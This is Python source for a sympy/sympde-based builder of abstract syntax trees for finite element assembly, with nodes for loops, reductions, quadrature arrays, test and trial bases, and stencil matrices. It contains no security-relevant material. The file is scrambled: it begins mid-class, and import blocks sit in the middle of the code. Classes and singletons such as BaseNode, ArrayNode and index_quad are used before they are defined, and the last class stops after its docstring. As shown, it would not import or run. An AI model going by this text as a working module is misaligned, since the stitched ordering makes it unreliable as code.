        return self._args[2]

#==============================================================================
class Reduce(Basic):
    """A reduction of rhs into lhs performed over a Loop."""

    def __new__(cls, op, rhs, lhs, loop):
        # TODO add verification on op = '-', '+', '*', '/'
        if not isinstance(loop, Loop):
            raise TypeError('Expecting a Loop')
        return Basic.__new__(cls, op, rhs, lhs, loop)

    @property
    def op(self):
        return self._args[0]

    @property
    def rhs(self):
        return self._args[1]

    @property
    def lhs(self):
        return self._args[2]

    @property
    def loop(self):
        return self._args[3]

#==============================================================================
class Reset(Basic):
    """Reset (zero out) the wrapped expression."""

    def __new__(cls, expr):
        return Basic.__new__(cls, expr)

    @property
    def expr(self):
        return self._args[0]

#==============================================================================
class ElementOf(Basic):
    """Reference to one element of a target object."""

    def __new__(cls, target):
        return Basic.__new__(cls, target)

    @property
    def target(self):
        return self._args[0]
#==============================================================================
class ExprNode(Basic):
    """Base class for expression nodes."""
    pass

#==============================================================================
class AtomicNode(ExprNode, AtomicExpr):
    """An atomic expression node."""

    @property
    def expr(self):
        return self._args[0]

#==============================================================================
class ValueNode(ExprNode):
    """A node holding the value of an expression."""

    def __new__(cls, expr):
        return Basic.__new__(cls, expr)

    @property
    def expr(self):
        return self._args[0]

#==============================================================================
class PhysicalValueNode(ValueNode):
    """Value in physical coordinates."""
    pass

#==============================================================================
class LogicalValueNode(ValueNode):
    """Value in logical coordinates."""
    pass

#==============================================================================
class PhysicalBasisValue(PhysicalValueNode):
    """Physical value of a basis expression."""
    pass

#==============================================================================
class LogicalBasisValue(LogicalValueNode):
    """Logical value of a basis expression."""
    pass

#==============================================================================
class PhysicalGeometryValue(PhysicalValueNode):
    """Physical value of a geometry expression."""
    pass

#==============================================================================
class LogicalGeometryValue(LogicalValueNode):
    """Logical value of a geometry expression."""
    pass
#==============================================================================
class BasisAtom(AtomicNode):
    """Atomic expression containing exactly one scalar/vector test function.

    The unique test function is cached and exposed through the `atom`
    property.
    """

    def __new__(cls, expr):
        atoms = list(expr.atoms(ScalarTestFunction))
        atoms += list(expr.atoms(VectorTestFunction))
        if len(atoms) != 1:
            # report the offending expression in the error itself instead of
            # printing debug output to stdout before raising
            raise ValueError(
                'Expecting an expression with one test function, '
                'got {} in {!r} ({})'.format(len(atoms), expr, type(expr)))

        obj = Basic.__new__(cls, expr)
        obj._atom = atoms[0]
        return obj

    @property
    def expr(self):
        return self._args[0]

    @property
    def atom(self):
        return self._atom

#==============================================================================
class GeometryAtom(AtomicNode):
    """Atomic expression containing exactly one Mapping.

    The unique mapping is cached and exposed through the `atom` property.
    """

    def __new__(cls, expr):
        atoms = list(expr.atoms(Mapping))
        if len(atoms) != 1:
            raise ValueError(
                'Expecting an expression with one mapping, '
                'got {} in {!r} ({})'.format(len(atoms), expr, type(expr)))

        # TODO
        obj = Basic.__new__(cls, expr)
        obj._atom = atoms[0]
        return obj

    @property
    def expr(self):
        return self._args[0]

    @property
    def atom(self):
        return self._atom

#==============================================================================
class GeometryExpr(Basic):
    """Pair (GeometryAtom, MatrixQuadrature) built from a geometry expression."""

    def __new__(cls, expr):
        # TODO assert on expr
        atom = GeometryAtom(expr)
        expr = MatrixQuadrature(expr)
        return Basic.__new__(cls, atom, expr)

    @property
    def atom(self):
        return self._args[0]

    @property
    def expr(self):
        return self._args[1]
#==============================================================================
class Loop(BaseNode):
    """
    Describe a loop of an iterator over a generator.

    Parameters
    ----------
    iterable : node or list of nodes
        Objects to iterate over; any GeometryExpressions entry is expanded
        into its individual GeometryExpr arguments.
    index : IndexNode
        The loop index.
    stmts : node or list of nodes, optional
        Statements executed inside the loop body.
    """

    def __new__(cls, iterable, index, stmts=None):
        if not isinstance(iterable, (list, tuple, Tuple)):
            iterable = [iterable]
        iterable = Tuple(*iterable)

        # replace GeometryExpressions by the list of expressions they hold
        others = [i for i in iterable if not isinstance(i, GeometryExpressions)]
        geos   = [i.arguments for i in iterable if isinstance(i, GeometryExpressions)]
        # (removed unused `with_geo` flag from the original)
        if len(geos) == 1:
            geos = list(geos[0])
        elif len(geos) > 1:
            raise NotImplementedError('TODO')

        iterable = Tuple(*(others + geos))

        if not isinstance(index, IndexNode):
            # include the offending object in the error instead of printing it
            raise TypeError('Expecting an index node, got {} {}'.format(type(index), index))

        # TODO - add assert w.r.t index type
        #      - this should be splitted/moved somewhere
        iterator  = []
        generator = []
        for a in iterable:
            i, g = construct_itergener(a, index)
            iterator.append(i)
            generator.append(g)
        iterator  = Tuple(*iterator)
        generator = Tuple(*generator)

        if stmts is None:
            stmts = []
        elif not isinstance(stmts, (tuple, list, Tuple)):
            stmts = [stmts]
        stmts = Tuple(*stmts)

        obj = Basic.__new__(cls, iterable, index, stmts)
        obj._iterator  = iterator
        obj._generator = generator
        return obj

    @property
    def iterable(self):
        return self._args[0]

    @property
    def index(self):
        return self._args[1]

    @property
    def stmts(self):
        return self._args[2]

    @property
    def iterator(self):
        return self._iterator

    @property
    def generator(self):
        return self._generator

    def get_geometry_stmts(self, mapping):
        """Return the geometry-related statements needed inside the loop."""
        args = []

        l_quad = list(self.generator.atoms(LocalTensorQuadrature))
        if len(l_quad) == 0:
            return Tuple(*args)

        assert len(l_quad) == 1
        l_quad = l_quad[0]

        args += [ComputeLogical(WeightedVolumeQuadrature(l_quad))]
        # an identity mapping needs no extra geometry expressions
        if isinstance(mapping, IdentityMapping):
            return Tuple(*args)

        # add stmts related to the geometry
        # TODO add other expressions
        args += [ComputeLogical(SymbolicDeterminant(mapping))]
        args += [ComputeLogical(SymbolicInverseDeterminant(mapping))]
        args += [ComputeLogical(SymbolicWeightedVolume(mapping))]

        return Tuple(*args)
#==============================================================================
class TensorIteration(BaseNode):
    """Pairing of a TensorIterator with a TensorGenerator."""

    def __new__(cls, iterator, generator):
        if not isinstance(iterator, TensorIterator):
            raise TypeError('Expecting an TensorIterator')
        if not isinstance(generator, TensorGenerator):
            raise TypeError('Expecting a TensorGenerator')

        return Basic.__new__(cls, iterator, generator)

    @property
    def iterator(self):
        return self._args[0]

    @property
    def generator(self):
        return self._args[1]

#==============================================================================
class ProductIteration(BaseNode):
    """Pairing of a ProductIterator with a ProductGenerator."""

    def __new__(cls, iterator, generator):
        if not isinstance(iterator, ProductIterator):
            raise TypeError('Expecting an ProductIterator')
        if not isinstance(generator, ProductGenerator):
            raise TypeError('Expecting a ProductGenerator')

        return Basic.__new__(cls, iterator, generator)

    @property
    def iterator(self):
        return self._args[0]

    @property
    def generator(self):
        return self._args[1]

#==============================================================================
class SplitArray(BaseNode):
    """Split of a target array at given positions into given lengths."""

    def __new__(cls, target, positions, lengths):
        if not isinstance(positions, (list, tuple, Tuple)):
            positions = [positions]
        positions = Tuple(*positions)

        if not isinstance(lengths, (list, tuple, Tuple)):
            lengths = [lengths]
        lengths = Tuple(*lengths)

        return Basic.__new__(cls, target, positions, lengths)

    @property
    def target(self):
        return self._args[0]

    @property
    def positions(self):
        return self._args[1]

    @property
    def lengths(self):
        return self._args[2]
#==============================================================================
def construct_logical_expressions(u, nderiv):
    """Return ComputeLogicalBasis nodes for every logical derivative of *u*
    of total order at most *nderiv* (dx1/dx2/dx3 applied per dimension)."""
    dim = u.space.ldim
    ops = [dx1, dx2, dx3][:dim]

    # multi-indices (i, j, [k]) with total order <= nderiv
    indices = [ijk for ijk in product(range(nderiv + 1), repeat=dim)
               if sum(ijk) <= nderiv]

    args = []
    for ijk in indices:
        atom = u
        for n, op in zip(ijk, ops):
            for _ in range(n):
                atom = op(atom)
        args.append(atom)

    return [ComputeLogicalBasis(i) for i in args]

#==============================================================================
class GeometryExpressions(Basic):
    """Collection of GeometryExpr nodes for all derivatives of the mapping
    components up to order *nderiv*."""

    def __new__(cls, M, nderiv):
        dim = M.rdim
        ops = [dx1, dx2, dx3][:dim]

        indices = [ijk for ijk in product(range(nderiv + 1), repeat=dim)
                   if sum(ijk) <= nderiv]

        args = []
        for d in range(dim):
            for ijk in indices:
                atom = M[d]
                for n, op in zip(ijk, ops):
                    for _ in range(n):
                        atom = op(atom)
                args.append(atom)

        exprs = Tuple(*[GeometryExpr(i) for i in args])
        return Basic.__new__(cls, exprs)

    @property
    def arguments(self):
        return self._args[0]
#==============================================================================
def construct_itergener(a, index):
    """Create the (iterator, generator) pair describing how node *a* is
    traversed along *index*.

    The generator type and the produced element depend on the class of
    *a*; the iterator then wraps that element with either a tensor or a
    product iterator.
    """
    # ... create generator
    # NOTE: rule order matters — subclasses (trial/test bases) must be
    # matched before their parent classes.
    rules = (
        (GlobalTensorQuadrature,
         lambda t: (TensorGenerator(t, index), LocalTensorQuadrature())),
        (LocalTensorQuadrature,
         lambda t: (TensorGenerator(t, index), TensorQuadrature())),
        (GlobalTensorQuadratureTrialBasis,
         lambda t: (TensorGenerator(t, index), LocalTensorQuadratureTrialBasis(t.target))),
        (LocalTensorQuadratureTrialBasis,
         lambda t: (TensorGenerator(t, index), TensorQuadratureTrialBasis(t.target))),
        (TensorQuadratureTrialBasis,
         lambda t: (TensorGenerator(t, index), TensorTrialBasis(t.target))),
        (GlobalTensorQuadratureTestBasis,
         lambda t: (TensorGenerator(t, index), LocalTensorQuadratureTestBasis(t.target))),
        (LocalTensorQuadratureTestBasis,
         lambda t: (TensorGenerator(t, index), TensorQuadratureTestBasis(t.target))),
        (TensorQuadratureTestBasis,
         lambda t: (TensorGenerator(t, index), TensorTestBasis(t.target))),
        (GlobalTensorQuadratureBasis,
         lambda t: (TensorGenerator(t, index), LocalTensorQuadratureBasis(t.target))),
        (LocalTensorQuadratureBasis,
         lambda t: (TensorGenerator(t, index), TensorQuadratureBasis(t.target))),
        (TensorQuadratureBasis,
         lambda t: (TensorGenerator(t, index), TensorBasis(t.target))),
        (GlobalSpan,
         lambda t: (TensorGenerator(t, index), Span(t.target))),
        (MatrixLocalBasis,
         lambda t: (ProductGenerator(t, index), CoefficientBasis(t.target))),
        (GeometryExpr,
         lambda t: (ProductGenerator(t.expr, index), t.atom)),
    )
    for klass, make in rules:
        if isinstance(a, klass):
            generator, element = make(a)
            break
    else:
        raise TypeError('{} not available'.format(type(a)))
    # ...

    # ... create iterator
    # Every tensor-product element gets a TensorIterator; coefficient and
    # geometry atoms get a ProductIterator.
    tensor_elements = (LocalTensorQuadrature,
                       TensorQuadrature,
                       LocalTensorQuadratureTrialBasis,
                       TensorQuadratureTrialBasis,
                       TensorTrialBasis,
                       LocalTensorQuadratureTestBasis,
                       TensorQuadratureTestBasis,
                       TensorTestBasis,
                       LocalTensorQuadratureBasis,
                       TensorQuadratureBasis,
                       TensorBasis,
                       Span)
    if isinstance(element, tensor_elements):
        iterator = TensorIterator(element)
    elif isinstance(element, (CoefficientBasis, GeometryAtom)):
        iterator = ProductIterator(element)
    else:
        raise TypeError('{} not available'.format(type(element)))
    # ...

    return iterator, generator
#==============================================================================
class Block(Basic):
    """
    A sequence of statements grouped as a single node.
    """
    def __new__(cls, body):
        # normalize body to a sympy Tuple of statements
        if not isinstance(body, (list, tuple, Tuple)):
            body = [body]
        body = Tuple(*body)
        return Basic.__new__(cls, body)

    @property
    def body(self):
        return self._args[0]
#==============================================================================
def is_scalar_field(expr):
    """Return True if *expr* is a ScalarField or any (logical) partial
    derivative of one."""
    if isinstance(expr, (_partial_derivatives, _logical_partial_derivatives)):
        # unwrap the derivative and test its operand
        return is_scalar_field(expr.args[0])
    return isinstance(expr, ScalarField)
#==============================================================================
def is_vector_field(expr):
    """Return True if *expr* is a (possibly indexed) VectorField or any
    (logical) partial derivative of one."""
    if isinstance(expr, (_partial_derivatives, _logical_partial_derivatives)):
        # unwrap the derivative and test its operand
        return is_vector_field(expr.args[0])
    return isinstance(expr, (VectorField, IndexedVectorField))
#==============================================================================
from sympy import Matrix, ImmutableDenseMatrix
from sympy import symbols
from pyccel.ast.core import _atomic
from sympde.expr import TerminalExpr
from sympde.expr import LinearForm
from sympde.expr import BilinearForm
from sympde.topology import element_of
from sympde.topology import ScalarField
from sympde.topology import VectorField, IndexedVectorField
from sympde.topology.space import ScalarTestFunction
from sympde.topology.space import VectorTestFunction
from sympde.topology.space import IndexedTestTrial
from sympde.topology.derivatives import _partial_derivatives
from sympde.topology.derivatives import _logical_partial_derivatives
from sympde.topology.derivatives import get_max_partial_derivatives
class AST(object):
    """
    Build the abstract syntax tree of the assembly code for a linear or
    bilinear form *expr*.

    The constructor computes the terminal (scalar) expression, the maximum
    derivative order it requires, and the per-test/trial-function basis
    nodes, then delegates to the form-specific builders.
    """
    def __init__(self, expr):
        # ... compute terminal expr
        # TODO check that we have one single domain/interface/boundary
        terminal_expr = TerminalExpr(expr)
        domain        = terminal_expr[0].target
        terminal_expr = terminal_expr[0].expr
        # print('> terminal expr = ', terminal_expr)
        # ...

        # ... compute max deriv
        # scan every entry of a matrix expression; otherwise the scalar one
        nderiv = 0
        if isinstance(terminal_expr, Matrix):
            n_rows, n_cols = terminal_expr.shape
            for i_row in range(0, n_rows):
                for i_col in range(0, n_cols):
                    d = get_max_partial_derivatives(terminal_expr[i_row,i_col])
                    nderiv = max(nderiv, max(d.values()))
        else:
            d = get_max_partial_derivatives(terminal_expr)
            nderiv = max(nderiv, max(d.values()))
        # print('> nderiv = ', nderiv)
        # ...

        # ... classify the form and collect its test/trial functions
        is_bilinear   = False
        is_linear     = False
        is_functional = False
        tests         = []
        trials        = []
        if isinstance(expr, LinearForm):
            is_linear = True
            tests     = expr.test_functions
        elif isinstance(expr, BilinearForm):
            is_bilinear = True
            tests       = expr.test_functions
            trials      = expr.trial_functions
        else:
            raise NotImplementedError('TODO')
        # ...

        # ... split atoms into field / vector-field / basis expressions
        atoms_types = (_partial_derivatives,
                       VectorTestFunction,
                       ScalarTestFunction,
                       IndexedTestTrial,
                       ScalarField,
                       VectorField, IndexedVectorField)
        atoms = _atomic(expr, cls=atoms_types)
        # ...

        # ...
        atomic_expr_field        = [atom for atom in atoms if is_scalar_field(atom)]
        atomic_expr_vector_field = [atom for atom in atoms if is_vector_field(atom)]
        atomic_expr              = [atom for atom in atoms if not( atom in atomic_expr_field ) and
                                    not( atom in atomic_expr_vector_field)]
        # ...

        # ... basis nodes (global/local/array/basis/span) per test function
        d_tests = {}
        for v in tests:
            d = {}
            d['global'] = GlobalTensorQuadratureTestBasis(v)
            d['local']  = LocalTensorQuadratureTestBasis(v)
            d['array']  = TensorQuadratureTestBasis(v)
            d['basis']  = TensorTestBasis(v)
            d['span']   = GlobalSpan(v)
            d_tests[v] = d
        # ...

        # ... basis nodes per trial function
        d_trials = {}
        for v in trials:
            d = {}
            d['global'] = GlobalTensorQuadratureTrialBasis(v)
            d['local']  = LocalTensorQuadratureTrialBasis(v)
            d['array']  = TensorQuadratureTrialBasis(v)
            d['basis']  = TensorTrialBasis(v)
            d['span']   = GlobalSpan(v)
            d_trials[v] = d
        # ...

        # ... dispatch to the form-specific AST builder
        if is_linear:
            ast = _create_ast_linear_form(terminal_expr, atomic_expr, tests, d_tests,
                                          nderiv, domain.dim)
        elif is_bilinear:
            ast = _create_ast_bilinear_form(terminal_expr, atomic_expr,
                                            tests, d_tests,
                                            trials, d_trials,
                                            nderiv, domain.dim)
        else:
            raise NotImplementedError('TODO')
        # ...

        self._expr   = ast
        self._nderiv = nderiv
        self._domain = domain

    @property
    def expr(self):
        return self._expr

    @property
    def nderiv(self):
        return self._nderiv

    @property
    def domain(self):
        return self._domain

    @property
    def dim(self):
        return self.domain.dim
#==============================================================================
def _create_ast_linear_form(terminal_expr, atomic_expr, tests, d_tests, nderiv, dim):
    """
    Build the assembly AST for a linear form: nested loops over elements,
    test-function dofs and quadrature points, reducing the kernel
    expression into local then global stencil vectors.
    """
    pads   = symbols('p1, p2, p3')[:dim]
    g_quad = GlobalTensorQuadrature()
    l_quad = LocalTensorQuadrature()

    # ... statements evaluated at each quadrature point
    stmts = []
    for v in tests:
        stmts += construct_logical_expressions(v, nderiv)

    stmts += [ComputePhysicalBasis(i) for i in atomic_expr]
    # ...

    # ... innermost loop: over quadrature points
    a_basis = tuple([d['array'] for v,d in d_tests.items()])
    loop  = Loop((l_quad, *a_basis), index_quad, stmts)
    # ...

    # ... TODO
    l_vec = StencilVectorLocalBasis(pads)
    # ...

    # ... accumulate kernel values into an element of the local vector
    loop = Reduce('+', ComputeKernelExpr(terminal_expr), ElementOf(l_vec), loop)
    # ...

    # ... loop over tests
    l_basis = tuple([d['local'] for v,d in d_tests.items()])
    stmts = [loop]
    loop  = Loop(l_basis, index_dof_test, stmts)
    # ...

    # ... TODO
    body  = (Reset(l_vec), loop)
    stmts = Block(body)
    # ...

    # ... outermost loop: over elements
    g_basis = tuple([d['global'] for v,d in d_tests.items()])
    g_span  = tuple([d['span'] for v,d in d_tests.items()])
    loop  = Loop((g_quad, *g_basis, *g_span), index_element, stmts)
    # ...

    # ... TODO
    g_vec = StencilVectorGlobalBasis(pads)
    # ...

    # ... TODO
    body = (Reset(g_vec), Reduce('+', l_vec, g_vec, loop))
    stmt = Block(body)
    # ...

    return stmt
#==============================================================================
def _create_ast_bilinear_form(terminal_expr, atomic_expr,
                              tests, d_tests,
                              trials, d_trials,
                              nderiv, dim):
    """
    Build the assembly AST for a bilinear form: nested loops over elements,
    test dofs, trial dofs and quadrature points, reducing the kernel
    expression into local then global stencil matrices.
    """
    pads   = symbols('p1, p2, p3')[:dim]
    g_quad = GlobalTensorQuadrature()
    l_quad = LocalTensorQuadrature()

    # ... statements evaluated at each quadrature point
    stmts = []
    for v in tests:
        stmts += construct_logical_expressions(v, nderiv)

    stmts += [ComputePhysicalBasis(i) for i in atomic_expr]
    # ...

    # ... innermost loop: over quadrature points
    a_basis_tests  = tuple([d['array'] for v,d in d_tests.items()])
    a_basis_trials = tuple([d['array'] for v,d in d_trials.items()])
    loop  = Loop((l_quad, *a_basis_tests, *a_basis_trials), index_quad, stmts)
    # ...

    # ... TODO
    l_mat = StencilMatrixLocalBasis(pads)
    # ...

    # ... accumulate kernel values into an element of the local matrix
    loop = Reduce('+', ComputeKernelExpr(terminal_expr), ElementOf(l_mat), loop)
    # ...

    # ... loop over trials
    l_basis = tuple([d['local'] for v,d in d_trials.items()])
    stmts = [loop]
    loop  = Loop(l_basis, index_dof_trial, stmts)
    # ...

    # ... loop over tests
    l_basis = tuple([d['local'] for v,d in d_tests.items()])
    stmts = [loop]
    loop  = Loop(l_basis, index_dof_test, stmts)
    # ...

    # ... TODO
    body  = (Reset(l_mat), loop)
    stmts = Block(body)
    # ...

    # ... outermost loop: over elements
    g_basis_tests  = tuple([d['global'] for v,d in d_tests.items()])
    g_basis_trials = tuple([d['global'] for v,d in d_trials.items()])
    # TODO d_trials or d_tests here?
    g_span  = tuple([d['span'] for v,d in d_trials.items()])
    loop  = Loop((g_quad, *g_basis_tests, *g_basis_trials, *g_span),
                 index_element, stmts)
    # ...

    # ... TODO
    g_mat = StencilMatrixGlobalBasis(pads)
    # ...

    # ... TODO
    body = (Reset(g_mat), Reduce('+', l_mat, g_mat, loop))
    stmt = Block(body)
    # ...
    return stmt
from collections import OrderedDict
from itertools import product
from sympy import Basic
from sympy.core.singleton import Singleton
from sympy.core.compatibility import with_metaclass
from sympy.core.containers import Tuple
from sympy import AtomicExpr
from sympde.topology import ScalarTestFunction, VectorTestFunction
from sympde.topology import (dx1, dx2, dx3)
from sympde.topology import Mapping
from sympde.topology import SymbolicDeterminant
from sympde.topology import SymbolicInverseDeterminant
from sympde.topology import SymbolicWeightedVolume
from sympde.topology import IdentityMapping
#==============================================================================
# TODO move it
import string
import random
def random_string(n):
    """Return a random tag of *n* lowercase letters and digits.

    A cryptographically secure source is used so that independently
    generated tags are very unlikely to collide.
    """
    alphabet = string.ascii_lowercase + string.digits
    rng = random.SystemRandom()
    return ''.join(rng.choice(alphabet) for _ in range(n))
#==============================================================================
class ArityType(with_metaclass(Singleton, Basic)):
    """Base class representing a form type: bilinear/linear/functional"""
    pass

class BilinearArity(ArityType):
    # arity of a bilinear form (tests and trials)
    pass

class LinearArity(ArityType):
    # arity of a linear form (tests only)
    pass

class FunctionalArity(ArityType):
    # arity of a functional (no test/trial functions)
    pass
#==============================================================================
class IndexNode(with_metaclass(Singleton, Basic)):
    """Base class representing one index of an iterator"""
    pass

class IndexElement(IndexNode):
    # index running over mesh elements
    pass

class IndexQuadrature(IndexNode):
    # index running over quadrature points
    pass

class IndexDof(IndexNode):
    # index running over degrees of freedom
    pass

class IndexDofTrial(IndexNode):
    # index running over trial-function dofs
    pass

class IndexDofTest(IndexNode):
    # index running over test-function dofs
    pass

class IndexDerivative(IndexNode):
    # index running over derivative orders
    pass

# singleton instances used throughout the AST builders
index_element   = IndexElement()
index_quad      = IndexQuadrature()
index_dof       = IndexDof()
index_dof_trial = IndexDofTrial()
index_dof_test  = IndexDofTest()
index_deriv     = IndexDerivative()
#==============================================================================
class LengthNode(with_metaclass(Singleton, Basic)):
    """Base class representing one length of an iterator"""
    pass

class LengthElement(LengthNode):
    # number of mesh elements
    pass

class LengthQuadrature(LengthNode):
    # number of quadrature points
    pass

class LengthDof(LengthNode):
    # number of degrees of freedom
    pass

class LengthDofTrial(LengthNode):
    # number of trial-function dofs
    pass

class LengthDofTest(LengthNode):
    # number of test-function dofs
    pass

# singleton instances, paired with the index_* singletons above
length_element   = LengthElement()
length_quad      = LengthQuadrature()
length_dof       = LengthDof()
length_dof_trial = LengthDofTrial()
length_dof_test  = LengthDofTest()
#==============================================================================
class RankNode(with_metaclass(Singleton, Basic)):
    """Base class representing a rank of an iterator"""
    pass

class RankDimension(RankNode):
    # symbolic rank equal to the space dimension
    pass

rank_dim = RankDimension()
#==============================================================================
class BaseNode(Basic):
    """
    Root class of all AST nodes defined in this module.
    """
    pass

#==============================================================================
class Element(BaseNode):
    """
    A mesh element node.
    """
    pass

#==============================================================================
class Pattern(Tuple):
    """
    Index pattern of an array: a Tuple with one entry (index or None) per
    array dimension.
    """
    pass
#==============================================================================
class IteratorBase(BaseNode):
    """
    Base class for iterators: wraps a *target* node together with optional
    *dummies* (dummy indices), normalized to a sympy Tuple.
    """
    def __new__(cls, target, dummies=None):
        # idiomatic identity test (was: `if not dummies is None`)
        if dummies is not None:
            if not isinstance(dummies, (list, tuple, Tuple)):
                dummies = [dummies]
            dummies = Tuple(*dummies)

        return Basic.__new__(cls, target, dummies)

    @property
    def target(self):
        return self._args[0]

    @property
    def dummies(self):
        # None when no dummies were given at construction
        return self._args[1]

#==============================================================================
class TensorIterator(IteratorBase):
    # iterator over a tensor-product structure
    pass

#==============================================================================
class ProductIterator(IteratorBase):
    # iterator over a plain (non tensor-product) structure
    pass
#==============================================================================
# TODO dummies should not be None
class GeneratorBase(BaseNode):
    """
    Base class for generators: wraps a *target* array/matrix node together
    with its dummy indices, normalized to a sympy Tuple.
    """
    def __new__(cls, target, dummies):
        if not isinstance(dummies, (list, tuple, Tuple)):
            dummies = [dummies]
        dummies = Tuple(*dummies)

        if not isinstance(target, (ArrayNode, MatrixNode)):
            # message now matches the actual check (MatrixNode was accepted
            # but not mentioned)
            raise TypeError('expecting an ArrayNode or a MatrixNode')

        return Basic.__new__(cls, target, dummies)

    @property
    def target(self):
        return self._args[0]

    @property
    def dummies(self):
        return self._args[1]

#==============================================================================
class TensorGenerator(GeneratorBase):
    # generator over a tensor-product structure
    pass

#==============================================================================
class ProductGenerator(GeneratorBase):
    # generator over a plain (non tensor-product) structure
    pass
#==============================================================================
class Grid(BaseNode):
    """
    The computational grid node.
    """
    pass

#==============================================================================
class ScalarNode(BaseNode, AtomicExpr):
    """
    Base class of scalar-valued AST nodes.
    """
    pass
#==============================================================================
class ArrayNode(BaseNode, AtomicExpr):
    """
    Base class of array-valued AST nodes.

    Subclasses set ``_rank`` (number of dimensions), ``_positions``
    (mapping index node -> dimension) and optionally ``_free_positions``
    (indices that remain free when iterating).
    """
    _rank = None
    _positions = None
    _free_positions = None

    @property
    def rank(self):
        return self._rank

    @property
    def positions(self):
        return self._positions

    @property
    def free_positions(self):
        # default: all declared positions are free
        if self._free_positions is None:
            return list(self.positions.keys())
        else:
            return self._free_positions

    def pattern(self, args=None):
        # Build a Pattern with the given indices placed at their declared
        # dimensions and None elsewhere.
        if args is None:
            args = self.free_positions

        positions = {}
        for a in args:
            positions[a] = self.positions[a]

        args = [None]*self.rank
        for k,v in positions.items():
            args[v] = k

        return Pattern(*args)
#==============================================================================
class MatrixNode(BaseNode, AtomicExpr):
    """
    Base class of matrix-valued AST nodes.
    """
    _rank = None

    @property
    def rank(self):
        return self._rank

    def pattern(self, positions):
        # patterns for matrix nodes are not implemented yet
        raise NotImplementedError('TODO')
#==============================================================================
class GlobalTensorQuadrature(ArrayNode):
    """
    Quadrature data for the whole mesh: indexed by element then by
    quadrature point.
    """
    _rank = 2
    _positions = {index_element: 0, index_quad: 1}
    _free_positions = [index_element]

#==============================================================================
class LocalTensorQuadrature(ArrayNode):
    # TODO add set_positions
    """
    Quadrature data restricted to one element: indexed by quadrature point.
    """
    _rank = 1
    _positions = {index_quad: 0}

#==============================================================================
class TensorQuadrature(ScalarNode):
    """
    Quadrature data at a single quadrature point.
    """
    pass
#==============================================================================
class MatrixQuadrature(MatrixNode):
    """
    Matrix of values of *target* at the quadrature points; its rank is the
    (symbolic) space dimension.
    """
    _rank = rank_dim

    def __new__(cls, target):
        # TODO check target
        return Basic.__new__(cls, target)

    @property
    def target(self):
        return self._args[0]

#==============================================================================
class WeightedVolumeQuadrature(ScalarNode):
    """
    Weighted volume (quadrature weight times jacobian) at a quadrature
    point.
    """
    pass
#==============================================================================
class GlobalTensorQuadratureBasis(ArrayNode):
    """
    Basis values at quadrature points for the whole mesh: indexed by
    element, dof, derivative order and quadrature point.
    """
    _rank = 4
    _positions = {index_quad: 3, index_deriv: 2, index_dof: 1, index_element: 0}
    _free_positions = [index_element]

    def __new__(cls, target):
        if not isinstance(target, (ScalarTestFunction, VectorTestFunction)):
            raise TypeError('Expecting a scalar/vector test function')
        return Basic.__new__(cls, target)

    @property
    def target(self):
        return self._args[0]

#==============================================================================
class LocalTensorQuadratureBasis(ArrayNode):
    """
    Basis values restricted to one element: indexed by dof, derivative
    order and quadrature point.
    """
    _rank = 3
    _positions = {index_quad: 2, index_deriv: 1, index_dof: 0}
    _free_positions = [index_dof]

    def __new__(cls, target):
        if not isinstance(target, (ScalarTestFunction, VectorTestFunction)):
            raise TypeError('Expecting a scalar/vector test function')
        return Basic.__new__(cls, target)

    @property
    def target(self):
        return self._args[0]

#==============================================================================
class TensorQuadratureBasis(ArrayNode):
    """
    Basis values for one dof: indexed by derivative order and quadrature
    point.
    """
    _rank = 2
    _positions = {index_quad: 1, index_deriv: 0}
    _free_positions = [index_quad]

    def __new__(cls, target):
        if not isinstance(target, (ScalarTestFunction, VectorTestFunction)):
            raise TypeError('Expecting a scalar/vector test function')
        return Basic.__new__(cls, target)

    @property
    def target(self):
        return self._args[0]
#==============================================================================
class CoefficientBasis(ScalarNode):
    """
    Scalar coefficient associated with a test function's basis.
    """
    def __new__(cls, target):
        if not isinstance(target, (ScalarTestFunction, VectorTestFunction)):
            raise TypeError('Expecting a scalar/vector test function')
        return Basic.__new__(cls, target)

    @property
    def target(self):
        return self._args[0]

#==============================================================================
class TensorBasis(CoefficientBasis):
    # basis value of a single dof at a single quadrature point
    pass
#==============================================================================
class GlobalTensorQuadratureTestBasis(GlobalTensorQuadratureBasis):
    # same layout as the parent, but the dof index is the test-dof index
    _positions = {index_quad: 3, index_deriv: 2, index_dof_test: 1, index_element: 0}

#==============================================================================
class LocalTensorQuadratureTestBasis(LocalTensorQuadratureBasis):
    # same layout as the parent, but the dof index is the test-dof index
    _positions = {index_quad: 2, index_deriv: 1, index_dof_test: 0}
    _free_positions = [index_dof_test]

#==============================================================================
class TensorQuadratureTestBasis(TensorQuadratureBasis):
    pass

#==============================================================================
class TensorTestBasis(TensorBasis):
    pass

#==============================================================================
class GlobalTensorQuadratureTrialBasis(GlobalTensorQuadratureBasis):
    # same layout as the parent, but the dof index is the trial-dof index
    _positions = {index_quad: 3, index_deriv: 2, index_dof_trial: 1, index_element: 0}

#==============================================================================
class LocalTensorQuadratureTrialBasis(LocalTensorQuadratureBasis):
    # same layout as the parent, but the dof index is the trial-dof index
    _positions = {index_quad: 2, index_deriv: 1, index_dof_trial: 0}
    _free_positions = [index_dof_trial]

#==============================================================================
class TensorQuadratureTrialBasis(TensorQuadratureBasis):
    pass

#==============================================================================
class TensorTrialBasis(TensorBasis):
    pass
#==============================================================================
class MatrixLocalBasis(MatrixNode):
    """
    used to describe local dof over an element
    """
    _rank = rank_dim

    def __new__(cls, target):
        # TODO check target
        return Basic.__new__(cls, target)

    @property
    def target(self):
        return self._args[0]
#==============================================================================
class StencilMatrixLocalBasis(MatrixNode):
    """
    used to describe local dof over an element as a stencil matrix
    """
    def __new__(cls, pads):
        if not isinstance(pads, (list, tuple, Tuple)):
            raise TypeError('Expecting an iterable')

        pads = Tuple(*pads)
        rank = 2*len(pads)
        # random tag to distinguish otherwise-identical instances
        tag  = random_string( 6 )
        return Basic.__new__(cls, pads, rank, tag)

    @property
    def pads(self):
        return self._args[0]

    @property
    def rank(self):
        return self._args[1]

    @property
    def tag(self):
        return self._args[2]

#==============================================================================
class StencilVectorLocalBasis(MatrixNode):
    """
    used to describe local dof over an element as a stencil vector
    """
    def __new__(cls, pads):
        if not isinstance(pads, (list, tuple, Tuple)):
            raise TypeError('Expecting an iterable')

        pads = Tuple(*pads)
        rank = len(pads)
        # random tag to distinguish otherwise-identical instances
        tag  = random_string( 6 )
        return Basic.__new__(cls, pads, rank, tag)

    @property
    def pads(self):
        return self._args[0]

    @property
    def rank(self):
        return self._args[1]

    @property
    def tag(self):
        return self._args[2]

#==============================================================================
class StencilMatrixGlobalBasis(MatrixNode):
    """
    used to describe global dofs as a stencil matrix
    """
